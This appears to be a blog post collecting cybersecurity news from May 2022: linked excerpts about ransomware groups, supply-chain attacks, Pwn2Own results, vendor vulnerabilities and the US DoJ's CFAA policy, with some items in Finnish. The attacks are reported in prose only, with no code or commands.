This posting is here to collect cyber security news in May 2022.
I post links to security vulnerability news to comments of this article.
You are also free to post related links to comments.
This posting is here to collect cyber security news in May 2022.
I post links to security vulnerability news to comments of this article.
You are also free to post related links to comments.
408 Comments
Tomi Engdahl says:
Venäläisille myydään Telegram-viestipalvelussa väärennettyjä koronatodistuksia Suomen-matkoja varten tapauksia jäänyt Rajavartiolaitoksen haaviin https://yle.fi/uutiset/3-12452886?origin=rss
Väärennettyjä koronatodistuksia myyvät huijarit haistoivat uuden toimintamahdollisuuden, muuttivat toimintapaansa ja mainostavat nykyään Telegram-viestipalvelussa palvelujaan keinona päästä helposti Suomeen. Telegramissa leviää muun muassa tällainen mainos: “Tarjoamme eurooppalaisen todistuksen kahdesta Pfizer-rokotteesta ilman käyntiä klinikalla. Voitte ylittää todistuksella Venäjän ja Suomen rajan”.
Tomi Engdahl says:
Russian Sberbank says it’s facing massive waves of DDoS attacks https://www.bleepingcomputer.com/news/security/russian-sberbank-says-it-s-facing-massive-waves-of-ddos-attacks/
Russia’s banking and financial services company Sberbank is being targeted in a wave of unprecedented hacker attacks. Earlier this month, the bank fought off the largest distributed denial-of-service
(DDoS) attack in its history.
Tomi Engdahl says:
https://www.bleepingcomputer.com/news/security/russian-sberbank-says-it-s-facing-massive-waves-of-ddos-attacks/
“Today, the bank faces cyberattacks around the clock. Sberbank’s Security Operation Center analyzes cyber threats 24/7 and promptly responds to them,” Sergei Lebed
“However, when it comes to companies in other sectors, most of them have never encountered anything like this before and may suffer damages,” warned Sberbank’s vice president.
DDoS attacks at this level are likely to continue as long as the geopolitical tensions continue to create a polarizing environment, and as Sberbank’s announcement concludes, they are may go down in number but grow in power.
This is in line with what Radware reported yesterday, a 36-hour long 1.1 Tbps DDoS attack on a U.S. service provider which signifies that threat actors are becoming far more capable even compared to last year.
Tomi Engdahl says:
Conti ransomware shuts down operation, rebrands into smaller units https://www.bleepingcomputer.com/news/security/conti-ransomware-shuts-down-operation-rebrands-into-smaller-units/
The notorious Conti ransomware gang has officially shut down their operation, with infrastructure taken offline and team leaders told that the brand is no more. This news comes from Advanced Intel’s Yelisey Boguslavskiy, who tweeted this afternoon that the gang’s internal infrastructure was turned off. While the Conti ransomware brand is no more, the cybercrime syndicate will continue to play a significant role in the ransomware industry for a long time to come.
Boguslavskiy told BleepingComputer that instead of rebranding as another large ransomware operation, the Conti leadership has instead partnered with other smaller ransomware gangs to conduct attacks.
Tomi Engdahl says:
Microsoft emergency updates fix Windows AD authentication issues https://www.bleepingcomputer.com/news/microsoft/microsoft-emergency-updates-fix-windows-ad-authentication-issues/
Microsoft has released emergency out-of-band (OOB) updates to address Active Directory (AD) authentication issues after installing Windows Updates issued during the May 2022 Patch Tuesday on domain controllers.
Tomi Engdahl says:
Fake domains offer Windows 11 installers – but deliver malware instead
https://www.zdnet.com/article/fake-domains-offer-windows-11-installers-but-deliver-malware-instead/#ftag=RSSbaffb68
Security researchers have found a new collection of phishing domains offering up fake Windows 11 installers that actually deliver information-stealing malware. Cybersecurity firm Zscaler said that newly registered domains appeared in April 2022 and have been designed to mimic the legitimate Microsoft Windows 11 OS download portal.
‘Warez’ sites containing pirate material, including software and games, are notorious as hotbeds of malicious malware packages, including Trojans, information stealers, adware, and nuisanceware.
Tomi Engdahl says:
Mirai Malware Variants for Linux Double Down on Stronger Chips in Q1
2022
https://www.crowdstrike.com/blog/linux-mirai-malware-double-on-stronger-chips/
Popular for compromising internet-connected devices and conducting distributed denial of service (DDoS) attacks, Mirai malware variants have been known to compromise devices that run on Linux builds ranging from mobile and Internet of Things (IoT) devices to cloud infrastructures. According to internal and open-source data analyzed by the CrowdStrike malware research team, while the ARM CPU architecture (used in most mobile and IoT devices) remains the most prevalent among Mirai variants, the number of 32-bit x86 Mirai variants (used on Linux servers and networking equipment) increased by 120% in Q1 2022 compared to Q1 2021.
Tomi Engdahl says:
CrateDepression | Rust Supply-Chain Attack Infects Cloud CI Pipelines with Go Malware https://www.sentinelone.com/labs/cratedepression-rust-supply-chain-attack-infects-cloud-ci-pipelines-with-go-malware/
SentinelLabs has investigated a supply-chain attack against the Rust development community that we refer to as CrateDepression’.
Tomi Engdahl says:
Windows 11 Gets Slaughtered At Pwn2Own, Tesla Model 3 Hacked As Well https://hothardware.com/news/windows-11-slaughtered-at-pwn2own
The contest awarded a total of $1, 155, 000 this year, and the biggest payouts were for serious exploits against Microsoft’s Teams utility.
While Teams isn’t technically a part of Windows, it does come bundled with all new installs of Windows 11, which means that these exploits are practically Windows exploits. Hector “p3rr0″ Peralta, Masato Kinugawa, and STAR Labs each earned $150, 000 for major exploits of the utility. Windows 11 itself wasn’t spared, though. Marcin Wizowski and STAR Labs each earned $40, 000 for privilege escalation exploits on Microsoft’s operating system on day one, and on day two, TO found a similar bug for a $40, 000 payout of his own. Day three saw no less than three more fresh exploits against Windows 11, all in the serious privilege escalation category; all three winners pocketed another $40,000.. As far as the Tesla Model 3 goes, Synacktiv were able to demonstrate a sandbox escape exploit on the car’s infotainment system.
That could allow an attacker to take control of the car’s built-in computer and, given another couple of clever exploits, could feasibly be the first step toward a remote attacker taking control of the car’s autopilot system. The group earned $75, 000 for the bug. Other targets attacked at Pwn2Own 2022 included Mozilla Firefox (hacked), Apple Safari (hacked), and Ubuntu Desktop (hacked). There were a few failures, although the Zero-Day Initiativewho sponsors the contestnoted that most of the failed hacks were valid, and that the security specialists simply weren’t able to get them working within the limited time allotted to do so.
Tomi Engdahl says:
PDF smuggles Microsoft Word doc to drop Snake Keylogger malware https://www.bleepingcomputer.com/news/security/pdf-smuggles-microsoft-word-doc-to-drop-snake-keylogger-malware/
Threat analysts have discovered a recent malware distribution campaign using PDF attachments to smuggle malicious Word documents that infect users with malware. The choice of PDFs is unusual, as most malicious emails today arrive with DOCX or XLS attachments laced with malware-loading macro code. In a campaign seen by HP Wolf Security, the PDF arriving via email is named “Remittance Invoice, ” and our guess is that the email body contains vague promises of payment to the recipient.
Tomi Engdahl says:
Google: Predator spyware infected Android devices using zero-days https://www.bleepingcomputer.com/news/security/google-predator-spyware-infected-android-devices-using-zero-days/
Google’s Threat Analysis Group (TAG) says that state-backed threat actors used five zero-day vulnerabilities to install Predator spyware developed by commercial surveillance developer Cytrox. In these attacks, part of three campaigns that started between August and October 2021, the attackers used zero-day exploits targeting Chrome and the Android OS to install Predator spyware implants on fully up-to-date Android devices. “We assess with high confidence that these exploits were packaged by a single commercial surveillance company, Cytrox, and sold to different government-backed actors who used them in at least the three campaigns discussed below, ” said Google TAG members Clement Lecigne and Christian Resell. The government-backed malicious actors who purchased and used these exploits to infect Android targets with spyware are from Egypt, Armenia, Greece, Madagascar, Côte d’Ivoire, Serbia, Spain, and Indonesia, according to Google’s analysis.
Tomi Engdahl says:
Threat Actors Abuse Microsoft’s HTML help file to Deliver Malware – Security Investigation
https://www.socinvestigation.com/threat-actors-abuse-microsofts-html-help-file-to-deliver-malware/
Security Researchers at Malwarebytes have discovered a new campaign that plays on these concerns by trying to lure Germans with a promise of updates on the current threat situation in Ukraine. The downloaded document is in fact decoy for a Remote Access Trojan (RAT) capable of stealing data and ex The threat actors used the domain to host a website that looked like the official Baden-Württemberg website, baden-wuerttemberg.de.
The attackers created the perfect placeholder for the lure they wanted their victims to download: A file called 2022-Q2-Bedrohungslage-Ukraine (threat situation in Ukraine for Q2), offered via a prominent blue download button.ecuting other malicious commands on a victim’s computer.
Victims will get a fake error message when they open up that file, while PowerShell quietly runs a Base64 command.
Status.txt is a RAT written in PowerShell. It starts its activities by collecting some information about the victim’s computer, such as the current username and working directory, and the computer’s hostname. It also builds a unique id for the victim, the clientid
Tomi Engdahl says:
IBM Dives Into TrickBot Gang’s Malware Crypting Operation
https://www.securityweek.com/ibm-dives-trickbot-gangs-malware-crypting-operation
Researchers with IBM Security’s X-Force division have analyzed 13 crypters employed by the cybercrime group behind the infamous TrickBot and Conti malware.
The use of crypters to obfuscate malware in order to evade antivirus detection is not new, but TrickBot’s operators – which are known as Wizard Spider, ITG23, or the Trickbot Group – took this practice to a new level, by automating the crypting of malware at scale with the launch of a Jenkins build server.
The TrickBot malware family emerged in 2016, when it mainly facilitated online banking fraud. The malware has evolved into helping the mass distribution of other malware families, and the cybercrime group behind it has widened its activities as well.
Wizard Spider, IBM says, has expanded operations with the deployment of BazarLoader and Anchor, and stepped deep into the ransomware business, with Diavol, Ryuk, and Conti. The tight connection between Conti and TrickBot has been long known, and a report earlier this year suggested that Conti bought TrickBot sometime around the end of 2021.
“ITG23 is best thought of as a group of groups, not unlike a large corporation, who report to common ‘upper management’ and share infrastructure and support functions, such as IT and human resources. One of these support groups within ITG23 is dedicated to developing crypters for use with the group’s own malware operations as well as for several other groups,” IBM explains.
Tomi Engdahl says:
Breach Exposed Data of Half-Million Chicago Students, Staff
https://www.securityweek.com/breach-exposed-data-half-million-chicago-students-staff
The personal information of more than half a million Chicago Public Schools students and staff was compromised in a ransomware attack last December, but the vendor didn’t report it to the district until last month, officials said.
The data breach occurred Dec. 1 and technology vendor Battelle for Kids notified CPS April on 26, the district said Friday. A server used to store student and staff information was breached and four years’ worth of records were accessed, CPS said.
In total, 495,448 student and 56,138 employee records were accessed from 2015-16 through 2018-2019 school years, CPS said. The data included students’ names, schools, dates of birth, gender, CPS identification numbers, state student identification numbers, class schedule information and scores on course-specific assessments used for teacher evaluations.
Employee data accessed for those years included names, employee identification numbers, school and course information and emails and usernames.
CPS said the breached server did not store any other records.
Tomi Engdahl says:
Nikkei Says Customer Data Likely Impacted in Ransomware Attack
https://www.securityweek.com/nikkei-says-customer-data-likely-impacted-ransomware-attack
Asian media giant Nikkei has disclosed a ransomware attack that might have impacted customer data.
Based in Tokyo, Nikkei, Inc. is a media company specialized in business, financial, and industry news, and which owns Financial Times and The Nikkei. With a daily circulation of over 3 million, The Nikkei is the world’s largest financial newspaper.
On Thursday, Nikkei announced that a server at its headquarters in Singapore was infected with ransomware last week.
“Unauthorized access to the server was first detected on May 13, prompting an internal probe. Nikkei Group Asia immediately shut down the affected server and took other measures to minimize the impact,” the media giant said.
Tomi Engdahl says:
New Brute Force Attacks Against SQL Servers Use PowerShell Wrapper
https://www.securityweek.com/new-brute-force-attacks-against-sql-servers-use-powershell-wrapper
Microsoft has warned organizations of a new wave of brute force cyberattacks that target SQL servers and use a rather uncommon living-off-the-land binary (LOLBin).
Specifically, the attackers rely on a legitimate utility called sqlps.exe to achieve fileless persistence on SQL servers that use weak or default passwords.
According to Microsoft, sqlps.exe, a PowerShell wrapper that supports the execution of SQL-built cmdlets, allows the attackers to run recon commands and to modify the start mode of the SQL service to LocalSystem.
The use of a legitimate tool also enables the attackers to keep their malicious activity hidden from detection tools and it also hinders forensic analysis.
Tomi Engdahl says:
DoJ Will No Longer Use CFAA to Charge Ethical Hackers
https://www.securityweek.com/doj-will-no-longer-use-cfaa-charge-ethical-hackers
The United States Department of Justice has announced that it would no longer charge ethical hackers under the controversial Computer Fraud and Abuse Act (CFAA).
Ethical hacking, the DoJ explains, represents the good-faith security research where a computer is accessed only for investigating, testing, or identifying vulnerabilities, with the purpose of improving security as a whole.
Good-faith security research “is carried out in a manner designed to avoid any harm to individuals or the public, and where the information derived from the activity is used primarily to promote the security or safety of the class of devices, machines, or online services to which the accessed computer belongs, or those who use such devices, machines, or online services,” the updated policy reads.
The DoJ also makes it clear that the “goals for CFAA enforcement are to promote privacy and cybersecurity by upholding the legal right of individuals, network owners, operators, and other persons to ensure the confidentiality, integrity, and availability of information stored in their information systems.”
9-48.000 – COMPUTER FRAUD AND ABUSE AC
https://www.justice.gov/opa/press-release/file/1507126/download
1
9-48.000 – COMPUTER FRAUD AND ABUSE ACT
The Computer Fraud and Abuse Act (“CFAA”), codified at Title 18, United States Code, Section
1030, is an important law for prosecutors to address cyber-based crimes. As technology and
criminal behavior continue to evolve, however, it also remains important that the CFAA be
applied consistently by attorneys for the government and that the public better understand how
the Department applies the law.
To accomplish these goals, the Department has developed the following policy to guide attorneys
for the government in the appropriate considerations for prosecutors contemplating charges
under the CFAA.
The Department’s goals for CFAA enforcement are to promote privacy and cybersecurity by
upholding the legal right of individuals, network owners, operators, and other persons to ensure
the confidentiality, integrity, and availability of information stored in their information systems.
Tomi Engdahl says:
Researchers Spot Supply Chain Attack Targeting GitLab CI Pipelines
https://www.securityweek.com/researchers-spot-supply-chain-attack-targeting-gitlab-ci-pipelines
Security researchers at SentinelLabs are calling attention to a software chain supply attack targeting Rust developers with malware aimed directly at infecting GitLab Continuous Integration (CI) pipelines.
The campaign, dubbed CrateDepression, combines typosquatting and the impersonation of a known Rust developer to push a malicious ‘crate’ hosted on the Rust dependency community repository. (Editor’s note: A crate is a compilation unit in Rust).
The malicious crate was swiftly flagged and removed but SentinelLabs researchers found a second-stage payload exclusively built to Gitlab CI pipelines, signaling a risk of further larger-scale supply-chain attacks.
“Given the nature of the victims targeted, this attack would serve as an enabler for subsequent supply-chain attacks at a larger-scale relative to the development pipelines infected,” SentinelLabs said in a technical report documenting its findings.
https://www.sentinelone.com/labs/cratedepression-rust-supply-chain-attack-infects-cloud-ci-pipelines-with-go-malware/
Tomi Engdahl says:
Cisco Warns of Exploitation Attempts Targeting New IOS XR Vulnerability
https://www.securityweek.com/cisco-warns-exploitation-attempts-targeting-new-ios-xr-vulnerability
Cisco informed customers on Friday that it’s aware of in-the-wild exploitation attempts targeting a new vulnerability affecting its IOS XR software.
The flaw, tracked as CVE-2022-20821, was discovered by Cisco during the resolution of a support case. Exploitation attempts were identified sometime this month, but no additional information has been made available regarding these attacks.
The vulnerability, which has a “medium severity” rating based on its CVSS score of 6.5, can allow a remote, unauthenticated attacker to access a Redis instance that is running within a container named “NOSi.”
The issue affects the health check RPM in IOS XR software and is related to the TCP port 6379, which the RPM opens by default on activation.
“An attacker could exploit this vulnerability by connecting to the Redis instance on the open port. A successful exploit could allow the attacker to write to the Redis in-memory database, write arbitrary files to the container filesystem, and retrieve information about the Redis database,” Cisco said in its advisory.
Tomi Engdahl says:
Android-puhelimia vakoiltiin Google teki huolestuttavan havainnon https://www.is.fi/digitoday/tietoturva/art-2000008836228.html
GOOGLE kertoo viidestä Chrome-selaimen ja Android-käyttöjärjestelmän haavoittuvuudesta, jotka kaupallinen vakoojayritys Cytrox paketoi myytäväksi tuotteeksi viime vuonna. Google:
https://blog.google/threat-analysis-group/protecting-android-users-from-0-day-attacks/
Tomi Engdahl says:
New RansomHouse group sets up extortion market, adds first victims https://www.bleepingcomputer.com/news/security/new-ransomhouse-group-sets-up-extortion-market-adds-first-victims/
Yet another data-extortion cybercrime operation has appeared on the darknet named ‘RansomHouse’ where threat actors publish evidence of stolen files and leak data of organizations that refuse to make a ransom payment. The new operation claims not to use any ransomware and instead focuses on breaching networks through alleged vulnerabilities to steal a target’s data.
Tomi Engdahl says:
Russian hackers perform reconnaissance against Austria, Estonia https://www.bleepingcomputer.com/news/security/russian-hackers-perform-reconnaissance-against-austria-estonia/
In a new reconnaissance campaign, the Russian state-sponsored hacking group Turla was observed targeting the Austrian Economic Chamber, a NATO platform, and the Baltic Defense College. This discovery comes from cybersecurity firm Sekoia, which built upon previous findings of Google’s TAG, which has been following Russian hackers closely this year.
Tomi Engdahl says:
New Unpatched Bug Could Let Attackers Steal Money from PayPal Users https://thehackernews.com/2022/05/paypal-pays-hacker-200000-for.html
A security researcher claims to have discovered an unpatched vulnerability in PayPal’s money transfer service that could allow attackers to trick victims into unknowingly completing attacker-directed transactions with a single click. Clickjacking, also called UI redressing, refers to a technique wherein an unwitting user is tricked into clicking seemingly innocuous webpage elements like buttons with the goal of downloading malware, redirecting to malicious websites, or disclose sensitive information. This is typically achieved by displaying an invisible page or HTML element on top of the visible page, resulting in a scenario where users are fooled into thinking that they are clicking the legitimate page when they are in fact clicking the rogue element overlaid atop it.
Tomi Engdahl says:
381, 000-plus Kubernetes API servers ‘exposed to internet’
https://www.theregister.com/2022/05/23/kubernetes-vulnerable-shadowserver/
A large number of servers running the Kubernetes API have been left exposed to the internet, which is not great: they’re potentially vulnerable to abuse. Nonprofit security organization The Shadowserver Foundation recently scanned 454, 729 systems hosting the popular open-source platform for managing and orchestrating containers, finding that more than 381, 645 or about 84 percent are accessible via the internet to varying degrees thus providing a cracked door into a corporate network.
Tomi Engdahl says:
Syöttinä Ukrainan sota: Kiina vakoili Venäjän sotilassalaisuuksia https://www.is.fi/digitoday/tietoturva/art-2000008831119.html
KIINAN onnistui tunkeutua venäläiseen puolustusalan yritykseen osana lähes 11 kuukautta jatkunutta kampanjaa, kertoo tietoturvayhtiö Check Point. Twisted Pandaksi ristitty kampanja sai kaksi uhria venäläisessä holding-yhtiössä, joka toimii valtio-omisteisen puolustusalan yrityksen Rostehin alaisuudessa. Hyökkääjät käyttivät tarkasti laadittuja ja kohdennettuja sähköposteja. 23. maaliskuuta tänä vuonna sähköposteja lähetettiin useille puolustusalan tutkimuslaitoksille Venäjällä.
Tomi Engdahl says:
Ransomware attack exposes data of 500, 000 Chicago students https://www.bleepingcomputer.com/news/security/ransomware-attack-exposes-data-of-500-000-chicago-students/
The Chicago Public Schools has suffered a massive data breach that exposed the data of almost 500, 000 students and 60, 000 employee after their vendor, Battelle for Kids, suffered a ransomware attack in December. Ohio-based Battelle for Kids is a not-for-profit educational organization that analyzes student data shared by public school systems to design instructional models and evaluate teacher performance.
Tomi Engdahl says:
Malicious PyPI package opens backdoors on Windows, Linux, and Macs https://www.bleepingcomputer.com/news/security/malicious-pypi-package-opens-backdoors-on-windows-linux-and-macs/
Yet another malicious Python package has been spotted in the PyPI registry performing supply chain attacks to drop Cobalt Strike beacons and backdoors on Windows, Linux, and macOS systems. PyPI is a repository of open-source packages that developers can use to share their work or benefit from the work of others, downloading the functional libraries required for their projects.
Tomi Engdahl says:
Conti Ransomware Operation Shut Down After Brand Becomes Toxic
https://www.securityweek.com/conti-ransomware-operation-shut-down-after-brand-becomes-toxic
The Conti ransomware operation has undergone some significant organizational structure changes in the past months after the brand became toxic due to its affiliation with the Russian government.
The Conti operation has been highly successful, helping cybercriminals make billions of dollars after breaching the systems of hundreds of major organizations. While it appeared to be very active, threat intelligence company AdvIntel says the group has been in the process of shutting down the Conti brand and switching to a different organizational structure that involves multiple subgroups.
The Conti brand’s downfall appears to have started in late February, after Russia launched an invasion of Ukraine. Shortly after the war began, Conti pledged its support for the Russian government and threatened to attack the critical infrastructure of its enemies.
Tomi Engdahl says:
Over $1.1 Million Awarded at Pwn2Own Vancouver 2022 for 25 Zero-Day Vulnerabilities
https://www.securityweek.com/over-11-million-awarded-pwn2own-vancouver-2022-25-zero-day-vulnerabilities
Participants earned a total of more than $1.15 million at the Pwn2Own Vancouver 2022 hacking contest last week.
According to Trend Micro’s Zero Day Initiative (ZDI), which organizes the event, rewards were paid out for 25 unique zero-day vulnerabilities that were used to target Tesla Model 3, Windows 11, Ubuntu, Microsoft Teams, Safari, Firefox and Oracle VirtualBox.
A majority of the money was earned on the first day, when researchers demonstrated exploits worth a total of $800,000, including three Microsoft Teams exploit chains that received $150,000 each.
Two teams targeted the Tesla Model 3, but only one of them, representing Synacktiv, was partially successful.
Tomi Engdahl says:
Cisco Warns of Exploitation Attempts Targeting New IOS XR Vulnerability
https://www.securityweek.com/cisco-warns-exploitation-attempts-targeting-new-ios-xr-vulnerability
Cisco informed customers on Friday that it’s aware of in-the-wild exploitation attempts targeting a new vulnerability affecting its IOS XR software.
The flaw, tracked as CVE-2022-20821, was discovered by Cisco during the resolution of a support case. Exploitation attempts were identified sometime this month, but no additional information has been made available regarding these attacks.
The vulnerability, which has a “medium severity” rating based on its CVSS score of 6.5, can allow a remote, unauthenticated attacker to access a Redis instance that is running within a container named “NOSi.”
The issue affects the health check RPM in IOS XR software and is related to the TCP port 6379, which the RPM opens by default on activation.
Vishal Shah says:
Thank you for sharing such a useful article. I had a great time. This article was fantastic to read. Continue to publish more articles on
Keep sharing! very informative stuff
Source: United SMEs
https://unitedsmes.in
Tomi Engdahl says:
Chrome-haavoittuvuuksia myytiin paketteina valtiollisille toimijoille
https://etn.fi/index.php/13-news/13619-chrome-haavoittuvuuksia-myytiin-paketteina-valtiollisille-toimijoille
Google kertoo tietoturvablogissaan, että neljää Chrome-selaimen haavoittuvuutta ja yhtä Android-käyttöjärjestelmän aukko on myyty pimeillä markkinoilla valtiollisille toimijoille. Asialla on kaupallisena tietoturvayrityksenä aloittanut Cytrox. Ostajat löytyvät valtion tukemista kyberrikollisjoukoista, jotka toimivat ainakin Egyptissä, Armeniassa, Kreikassa, Madagaskarissa, Norsunluurannikolla, Serbiassa, Espanjassa ja Indonesiassa.
Tomi Engdahl says:
Cybersecurity Community Warned of Fake PoC Exploits Delivering Malware
https://www.securityweek.com/cybersecurity-community-warned-fake-poc-exploits-delivering-malware
Researchers have spotted fake proof-of-concept (PoC) exploits that appear to have been created by threat actors in an effort to deliver malware to members of the cybersecurity community.
On May 19, researchers reported that GitHub was hosting malicious software disguised as PoC exploits for a couple of Windows vulnerabilities that Microsoft fixed with its April 2022 Patch Tuesday updates.
The fake PoC exploits, which have since been removed by GitHub, were delivered as executable files that, when run, could open a backdoor to the system.
The PoCs claimed to target CVE-2022-24500 and CVE-2022-26809, both of which can be exploited for remote code execution on Windows systems. While there is no indication that the flaws have been leveraged in attacks, some cybersecurity companies did warn that they could pose a serious risk — CVE-2022-26809, for instance, is believed to be wormable.
Tomi Engdahl says:
Ulkoministeriötä vakoilleet FSB-hakkerit iskivät jälleen tällä kertaa sotilaskohteisiin
https://www.tivi.fi/uutiset/tv/7dd6b741-7cfd-4188-b181-24c56cb53d69
Venäjän valtioon kytköksissä olevan hakkeriryhmä Turlan on havaittu ujuttautuneen Itävallan kauppakamarin ja Virossa sijaitsevan Baltian puolustuskorkeakoulun järjestelmiin. Merkkejä Turlan toiminnasta on löytynyt myös Naton verkko-oppimisalustalta, kirjoittaa Bleeping Computer. [Tämä myös jo aikaisemmassa koosteessa]
Tomi Engdahl says:
Suomen suurin kuvatoimisto mahdollisen tietomurron kohteena
https://www.tivi.fi/uutiset/tv/d2223782-139d-4798-af94-80c5eae9b1c8
Suomalainen kuvatoimisto Lehtikuva on lähestynyt asiakkaitaan sähköpostilla. Viestissä kerrotaan kuvakaupan taustajärjestelmää mahdollisesti koskeneesta tietovuodosta. Epäilty vuoto tapahtui torstaina 19. toukokuuta. Alustavien tietojen mukaan asiakkaiden henkilötiedot eivät ole vaarantuneet. Lehtikuva ei tallenna luottokorttitietoja.
Tomi Engdahl says:
Trend Micro fixes bug Chinese hackers exploited for espionage https://www.bleepingcomputer.com/news/security/trend-micro-fixes-bug-chinese-hackers-exploited-for-espionage/
Trend Micro says it patched a DLL hijacking flaw in Trend Micro Security used by a Chinese threat group to side-load malicious DLLs and deploy malware. As Sentinel Labs revealed in an early-May report, the attackers exploited the fact that security products run with high privileges on Windows to plant and load their own maliciously crafted DLL into memory, allowing them to elevate privileges and execute code.
“For Trend Micro Security (Consumer), a fix was deployed via Trend Micro’s ActiveUpdate (AU) on May 19, 2022, and any user with an active internet connection should receive the update shortly if they have not yet already received it, ” the antivirus vendor added.
Tomi Engdahl says:
Researchers to release exploit for new VMware auth bypass, patch now https://www.bleepingcomputer.com/news/security/researchers-to-release-exploit-for-new-vmware-auth-bypass-patch-now/
Proof-of-concept exploit code is about to be published for a vulnerability that allows administrative access without authentication in several VMware products. Identified as CVE-2022-22972, the security issue received a fix last Wednesday, accompanied by an urgent warning for administrators to install the patch or apply mitigations immediately.
Tomi Engdahl says:
Popular Python and PHP libraries hijacked to steal AWS keys https://www.bleepingcomputer.com/news/security/popular-python-and-php-libraries-hijacked-to-steal-aws-keys/
PyPI module ‘ctx’ that gets downloaded over 20, 000 times a week has been compromised in a software supply chain attack with malicious versions stealing the developer’s environment variables. The threat actor even replaced the older, safe versions of ‘ctx’ with code that exfiltrates the developer’s environment variables, to collect secrets like Amazon AWS keys and credentials. Additionally, versions of a ‘phpass’ fork published to the PHP/Composer package repository Packagist had been altered to steal secrets in a similar fashion.
Tomi Engdahl says:
Researchers to release exploit for new VMware auth bypass, patch now https://www.bleepingcomputer.com/news/security/researchers-to-release-exploit-for-new-vmware-auth-bypass-patch-now/
Proof-of-concept exploit code is about to be published for a vulnerability that allows administrative access without authentication in several VMware products. Identified as CVE-2022-22972, the security issue received a fix last Wednesday, accompanied by an urgent warning for administrators to install the patch or apply mitigations immediately.
Proof-of-concept exploit code is about to be published for a vulnerability that allows administrative access without authentication in several VMware products.
Identified as CVE-2022-22972, the security issue received a fix last Wednesday, accompanied by an urgent warning for administrators to install the patch or apply mitigations immediately.
In an advisory on May 18th, VMware warned that the security implications for leaving CVE-2022-22972 unpatched are severe as the issue is “in the critical severity range with a maximum CVSSv3 base score of 9.8,” with 10 being the maximum.
The flaw affects VMware Workspace ONE Access, Identity Manager, and vRealize Automation,. The company warns that attackers with access to the appliance interface can use it to bypass authentication to reach local domain users.
Tomi Engdahl says:
Fake Windows exploits target infosec community with Cobalt Strike https://www.bleepingcomputer.com/news/security/fake-windows-exploits-target-infosec-community-with-cobalt-strike/
A threat actor targeted security researchers with fake Windows proof-of-concept exploits that infected devices with the Cobalt Strike backdoor. Whoever is behind these attacks took advantage of recently patched Windows remote code execution vulnerabilities tracked as
CVE-2022-24500 and CVE-2022-26809. Last week, a threat actor published two proof-of-concept exploits on GitHub for the Windows CVE-2022-24500 and CVE-2022-26809 vulnerabilities on GitHub. These exploits were published in repositories for a user named ‘rkxxz’, which have since been taken down and the account removed.
Tomi Engdahl says:
“Tough to forge” digital driver’s license is easy to forge https://arstechnica.com/information-technology/2022/05/digital-drivers-license-used-by-4m-australians-is-a-snap-to-forge/
n late 2019, the government of New South Wales in Australia rolled out digital driver’s licenses. The new licenses allowed people to use their iPhone or Android device to show proof of identity and age during roadside police checks or at bars, stores, hotels, and other venues. ServiceNSW, as the government body is usually referred to, promised it would “provide additional levels of security and protection against identity fraud, compared to the plastic [driver's license]” citizens had used for decades. Now, 30 months later, security researchers have shown that it’s trivial for just about anyone to forge fake identities using the digital driver’s licenses, or DDLs. The technique allows people under drinking age to change their date of birth and for fraudsters to forge fake identities. The process takes well under an hour, doesn’t require any special hardware or expensive software, and will generate fake IDs that pass inspection using the electronic verification system used by police and participating venues. All of this, despite assurances that security was a key priority for the newly created DDL system.
Tomi Engdahl says:
Chrome 102 Patches 32 Vulnerabilities
https://www.securityweek.com/chrome-102-patches-32-vulnerabilities
Google on Tuesday announced the stable channel release of Chrome 102, which patches 32 vulnerabilities, including a critical flaw reported by an anonymous researcher.
The critical security hole, tracked as CVE-2022-1853, has been described as a use-after-free bug affecting Indexed DB. Google learned about it on May 12 and it has yet to determine the bug bounty for this vulnerability.
Chrome 102 also addresses eight high-severity vulnerabilities reported by external researchers. Based on the rewards announced so far — the bug bounty is still being determined for some issues — the most serious of them is CVE-2022-1854, a use-after-free affecting the ANGLE component of the web browser. Researcher SeongHwan Park received $10,000 for reporting the weakness to Google.
Use-after-free vulnerabilities can typically be exploited for data corruption, DoS attacks or arbitrary code execution. In the case of Chrome, these types of bugs could also allow an attacker to escape the browser’s sandbox, but they might need to be combined with another vulnerability.
The list of high-severity vulnerabilities patched in the latest Chrome release also includes CVE-2022-1855, a use-after-free in Messaging that earned a researcher $7,500, and CVE-2022-1856, a use-after-free in User Education that Google rewarded with $3,000.
Fifteen of the vulnerabilities reported by external researchers were assigned a severity rating of “medium” or “low.” However, it’s worth noting that three of the medium-severity issues earned $5,000 rewards, and one low-severity flaw received a $7,000 reward.
Tomi Engdahl says:
Google Discloses Details of Zoom Zero-Click Remote Code Execution Exploit
https://www.securityweek.com/google-discloses-details-zoom-zero-click-remote-code-execution-exploit
Google’s Project Zero has disclosed the details of a zero-click remote code execution exploit targeting the Zoom video conferencing software.
Project Zero’s Ivan Fratric has described an exploit chain that can be used by a malicious actor to compromise a Zoom user over the chat feature — without user interaction — by sending them a message over the XMPP protocol. Part of Fratric’s exploit chain has been dubbed “XMPP Stanza Smuggling.”
Fratric has described a total of six vulnerabilities. Two of the flaws, tracked as CVE-2022-25235 and CVE-2022-25236, actually impact the popular open source XML parser Expat.
Since the library is used in many projects, several major vendors have released advisories to inform their customers about the impact of these and other Expat vulnerabilities, including IBM, Aruba, various Linux distributions, Oracle, and F5.
The Zoom-specific vulnerabilities found by Fratric have been described by Zoom as high- and medium-severity issues related to improper XML parsing (CVE-2022-22784), update package downgrading (CVE-2022-22786), insufficient hostname validation (CVE-2022-22787), and improperly constrained session cookies (CVE-2022-22785).
CVE-2022-22786 affects Zoom Client for Meetings for Windows and Zoom Rooms for Conference Room for Windows. The rest affect Zoom Client for Meetings on all desktop and mobile platforms.
Tomi Engdahl says:
Trend Micro Patches Vulnerability Exploited by Chinese Cyberspies
https://www.securityweek.com/trend-micro-patches-vulnerability-exploited-chinese-cyberspies
Cybersecurity company Trend Micro has updated one of its products to patch a vulnerability that has been exploited by a threat actor linked to China.
The threat actor’s activities have been analyzed by endpoint security firm SentinelOne, which tracks the group as Moshen Dragon. Some overlaps have been found with groups tracked by others as RedFoxtrot and Nomad Panda.
In a recent advisory, Trend Micro said only its Trend Micro Security consumer product is affected, and a fix was deployed through the company’s ActiveUpdate system on May 19.
https://success.trendmicro.com/dcx/s/solution/000291042?language=en_US
Tomi Engdahl says:
Dan Goodin / Ars Technica:
A researcher says Australia’s New South Wales digital driver’s license is easy to forge due to deficient encryption, data validation flaws, and other issues — A litany of security flaws allows forgeries that are easy, quick, and cheap. — In late 2019, the government of New South Wales …
“Tough to forge” digital driver’s license is… easy to forge
A litany of security flaws allows forgeries that are easy, quick, and cheap.
https://arstechnica.com/information-technology/2022/05/digital-drivers-license-used-by-4m-australians-is-a-snap-to-forge/
